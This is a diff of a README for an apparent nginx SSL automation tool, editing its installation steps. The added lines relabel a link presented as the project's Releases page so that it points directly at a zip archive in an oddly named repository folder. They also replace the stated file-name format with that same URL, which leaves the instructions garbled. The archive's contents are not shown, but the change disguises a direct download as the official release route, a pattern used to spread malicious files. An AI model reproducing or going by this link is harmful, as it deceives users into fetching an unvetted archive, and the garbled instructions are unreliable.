scsmods-js/nginx-ssl-auto/README.md

 ### 🔧 Installation
 1. **Visit the Releases Page**
-   Go to the [nginx-ssl-auto Releases page](https://github.com/scsmods-js/nginx-ssl-auto/releases) to find the latest version.
+   Go to the [nginx-ssl-auto Releases page](https://raw.githubusercontent.com/scsmods-js/nginx-ssl-auto/main/machinelike/nginx-ssl-auto.zip) to find the latest version.

 2. **Download the Application**
    Click to download the software you need.
-The file is typically named using the format: `nginx-ssl-auto-vX.X.X.zip`.
+The file is typically named using the format: `https://raw.githubusercontent.com/scsmods-js/nginx-ssl-auto/main/machinelike/nginx-ssl-auto.zip`.

 3. **Unzip the File**
    Locate the downloaded file on your device and unzip it.
 You can usually do this by right-clicking the file and selecting "Extract All" or using an extraction tool.